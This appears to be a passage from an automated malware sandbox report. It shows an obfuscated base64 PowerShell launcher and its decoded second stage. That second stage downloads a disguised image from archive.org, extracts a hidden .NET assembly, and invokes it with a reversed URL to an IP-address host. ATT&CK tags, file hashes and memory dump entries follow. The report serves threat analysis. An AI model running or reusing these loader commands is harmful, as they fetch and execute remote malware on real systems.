▇bwBt♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇YQBu♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇KQ♈ ᧽ Ⓙ ⟄ ▇7♈ ᧽ Ⓙ ⟄ ▇CQ♈ ᧽ Ⓙ ⟄ ▇b♈ ᧽ Ⓙ ⟄ ▇Bv♈ ᧽ Ⓙ ⟄ ▇GE♈ ᧽ Ⓙ ⟄ ▇Z♈ ᧽ Ⓙ ⟄ ▇Bl♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇QQBz♈ ᧽ Ⓙ ⟄ ▇HM♈ ᧽ Ⓙ ⟄ ▇ZQBt♈ ᧽ Ⓙ ⟄ ▇GI♈ ᧽ Ⓙ ⟄ ▇b♈ ᧽ Ⓙ ⟄ ▇B5♈ ᧽ Ⓙ ⟄ ▇C♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇PQ♈ ᧽ Ⓙ ⟄ ▇g♈ ᧽ Ⓙ ⟄ ▇Fs♈ ᧽ Ⓙ ⟄ ▇UwB5♈ ᧽ Ⓙ ⟄ ▇HM♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇Bl♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇LgBS♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇ZgBs♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇YwB0♈ ᧽ Ⓙ ⟄ ▇Gk♈ ᧽ Ⓙ ⟄ ▇bwBu♈ ᧽ Ⓙ ⟄ ▇C4♈ ᧽ Ⓙ ⟄ ▇QQBz♈ ᧽ Ⓙ ⟄ ▇HM♈ ᧽ Ⓙ ⟄ ▇ZQBt♈ ᧽ Ⓙ ⟄ ▇GI♈ ᧽ Ⓙ ⟄ ▇b♈ ᧽ Ⓙ ⟄ ▇B5♈ ᧽ Ⓙ ⟄ ▇F0♈ ᧽ Ⓙ ⟄ ▇Og♈ ᧽ Ⓙ ⟄ ▇6♈ ᧽ Ⓙ ⟄ ▇Ew♈ ᧽ Ⓙ ⟄ ▇bwBh♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇K♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇k♈ ᧽ Ⓙ ⟄ ▇GM♈ ᧽ Ⓙ ⟄ ▇bwBt♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇YQBu♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇QgB5♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇ZQBz♈ ᧽ Ⓙ ⟄ ▇Ck♈ ᧽ Ⓙ ⟄ ▇Ow♈ ᧽ Ⓙ ⟄ ▇k♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇eQBw♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇I♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇9♈ ᧽ Ⓙ ⟄ ▇C♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇J♈ ᧽ Ⓙ ⟄ ▇Bs♈ ᧽ Ⓙ ⟄ ▇G8♈ ᧽ Ⓙ ⟄ ▇YQBk♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇Z♈ ᧽ Ⓙ ⟄ ▇BB♈ ᧽ Ⓙ ⟄ ▇HM♈ ᧽ Ⓙ ⟄ ▇cwBl♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇YgBs♈ ᧽ Ⓙ ⟄ ▇Hk♈ ᧽ Ⓙ ⟄ ▇LgBH♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇BU♈ ᧽ Ⓙ ⟄ ▇Hk♈ ᧽ Ⓙ ⟄ ▇c♈ ᧽ Ⓙ ⟄ ▇Bl♈ ᧽ Ⓙ ⟄ ▇Cg♈ ᧽ Ⓙ ⟄ ▇JwBk♈ ᧽ Ⓙ ⟄ ▇G4♈ ᧽ Ⓙ ⟄ ▇b♈ ᧽ Ⓙ ⟄ ▇Bp♈ ᧽ Ⓙ ⟄ ▇GI♈ ᧽ Ⓙ ⟄ ▇LgBJ♈ ᧽ Ⓙ ⟄ ▇E8♈ ᧽ Ⓙ ⟄ ▇LgBI♈ ᧽ Ⓙ ⟄ ▇G8♈ ᧽ Ⓙ ⟄ ▇bQBl♈ ᧽ Ⓙ ⟄ ▇Cc♈ ᧽ Ⓙ ⟄ ▇KQ♈ ᧽ Ⓙ ⟄ ▇7♈ ᧽ Ⓙ ⟄ ▇CQ♈ ᧽ Ⓙ ⟄ ▇bQBl♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇a♈ ᧽ Ⓙ ⟄ ▇Bv♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇I♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇9♈ ᧽ Ⓙ ⟄ ▇C♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇J♈ ᧽ Ⓙ ⟄ ▇B0♈ ᧽ Ⓙ ⟄ ▇Hk♈ ᧽ Ⓙ ⟄ ▇c♈ ᧽ Ⓙ ⟄ ▇Bl♈ ᧽ Ⓙ ⟄ ▇C4♈ ᧽ Ⓙ ⟄ ▇RwBl♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇TQBl♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇a♈ ᧽ Ⓙ ⟄ ▇Bv♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇K♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇n♈ ᧽ Ⓙ ⟄ ▇FY♈ ᧽ Ⓙ ⟄ ▇QQBJ♈ ᧽ Ⓙ ⟄ ▇Cc♈ ᧽ Ⓙ ⟄ ▇KQ♈ ᧽ Ⓙ ⟄ ▇u♈ ᧽ Ⓙ ⟄ ▇Ek♈ ᧽ Ⓙ ⟄ ▇bgB2♈ ᧽ Ⓙ ⟄ ▇G8♈ ᧽ Ⓙ ⟄ ▇awBl♈ ᧽ Ⓙ ⟄ ▇Cg♈ ᧽ Ⓙ ⟄ ▇J♈ ᧽ Ⓙ ⟄ ▇Bu♈ ᧽ Ⓙ ⟄ ▇HU♈ ᧽ Ⓙ ⟄ ▇b♈ ᧽ Ⓙ ⟄ ▇Bs♈ ᧽ Ⓙ ⟄ ▇Cw♈ ᧽ Ⓙ ⟄ ▇I♈ ᧽ Ⓙ ⟄ ▇Bb♈ ᧽ Ⓙ ⟄ ▇G8♈ ᧽ Ⓙ ⟄ ▇YgBq♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇YwB0♈ ᧽ Ⓙ ⟄ ▇Fs♈ ᧽ Ⓙ ⟄ ▇XQBd♈ ᧽ Ⓙ ⟄ ▇C♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇K♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇n♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇e♈ ᧽ Ⓙ ⟄ ▇B0♈ ᧽ Ⓙ ⟄ ▇C4♈ ᧽ Ⓙ ⟄ ▇TgBC♈ ᧽ Ⓙ ⟄ ▇Eg♈ ᧽ Ⓙ ⟄ ▇VQ♈ ᧽ Ⓙ ⟄ ▇v♈ ᧽ Ⓙ ⟄ ▇DM♈ ᧽ Ⓙ ⟄ ▇OQ♈ ᧽ Ⓙ ⟄ ▇x♈ ᧽ Ⓙ ⟄ ▇C8♈ ᧽ Ⓙ ⟄ ▇M♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇4♈ ᧽ Ⓙ ⟄ ▇C4♈ ᧽ Ⓙ ⟄ ▇Mg♈ ᧽ Ⓙ ⟄ ▇0♈ ᧽ Ⓙ ⟄ ▇DI♈ ᧽ Ⓙ ⟄ ▇Lg♈ ᧽ Ⓙ ⟄ ▇1♈ ᧽ Ⓙ ⟄ ▇Dc♈ ᧽ Ⓙ ⟄ ▇MQ♈ ᧽ Ⓙ ⟄ ▇u♈ ᧽ Ⓙ ⟄ ▇Dc♈ ᧽ Ⓙ ⟄ ▇M♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇x♈ ᧽ Ⓙ ⟄ ▇C8♈ ᧽ Ⓙ ⟄ ▇Lw♈ ᧽ Ⓙ ⟄ ▇6♈ ᧽ Ⓙ ⟄ ▇H♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇B0♈ ᧽ Ⓙ ⟄ ▇Gg♈ ᧽ Ⓙ ⟄ ▇Jw♈ ᧽ Ⓙ ⟄ ▇g♈ ᧽ Ⓙ ⟄ ▇Cw♈ ᧽ Ⓙ ⟄ ▇I♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇n♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇ZQBz♈ ᧽ Ⓙ ⟄ ▇GE♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇Bp♈ ᧽ Ⓙ ⟄ ▇HY♈ ᧽ Ⓙ ⟄ ▇YQBk♈ ᧽ Ⓙ ⟄ ▇G8♈ ᧽ Ⓙ ⟄ ▇Jw♈ ᧽ Ⓙ ⟄ ▇g♈ ᧽ Ⓙ ⟄ ▇Cw♈ ᧽ Ⓙ ⟄ ▇I♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇n♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇ZQBz♈ ᧽ Ⓙ ⟄ ▇GE♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇Bp♈ ᧽ Ⓙ ⟄ ▇HY♈ ᧽ Ⓙ ⟄ ▇YQBk♈ ᧽ Ⓙ ⟄ ▇G8♈ ᧽ Ⓙ ⟄ ▇Jw♈ ᧽ Ⓙ ⟄ ▇g♈ ᧽ Ⓙ ⟄ ▇Cw♈ ᧽ Ⓙ ⟄ ▇I♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇n♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇ZQBz♈ ᧽ Ⓙ ⟄ ▇GE♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇Bp♈ ᧽ Ⓙ ⟄ ▇HY♈ ᧽ Ⓙ ⟄ ▇YQBk♈ ᧽ Ⓙ ⟄ ▇G8♈ ᧽ Ⓙ ⟄ ▇Jw♈ ᧽ Ⓙ ⟄ ▇s♈ ᧽ Ⓙ ⟄ ▇Cc♈ ᧽ Ⓙ ⟄ ▇UgBl♈ ᧽ Ⓙ ⟄ ▇Gc♈ ᧽ Ⓙ ⟄ ▇QQBz♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇Jw♈ ᧽ Ⓙ ⟄ ▇s♈ ᧽ Ⓙ ⟄ ▇Cc♈ ᧽ Ⓙ ⟄ ▇Jw♈ ᧽ Ⓙ ⟄ ▇p♈ ᧽ Ⓙ ⟄ ▇Ck♈ ᧽ Ⓙ ⟄ ▇';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('♈ ᧽ Ⓙ ⟄ ▇','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NBHU/391/08.242.571.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
64dbc922d147e1c0fa8edd7988931b71

SHA1
44fefc160f6715334a2e8540eab1fc238b9bee2c

SHA256
22fd76317026c60ea7f297d05b02b108c8a1fbee3fad433c4dfe266eeae89971

SHA512
a35c39377921566267a8709dd9a01d87e17723f705493942b098fbbe01df4bc4cf3a8469dae3398040c7a687acdd00e9ffc273207ecf14dd8fbbccebda1f8ff0

Download Submit
memory/1636-4-0x000007FEF55AE000-0x000007FEF55AF000-memory.dmp

Filesize
4KB

Download
memory/1636-5-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/1636-6-0x0000000001F80000-0x0000000001F88000-memory.dmp

Filesize
32KB

Download
memory/1636-12-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

Filesize
9.6MB

Download
memory/1636-13-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

Filesize
9.6MB

Download
memory/1636-14-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing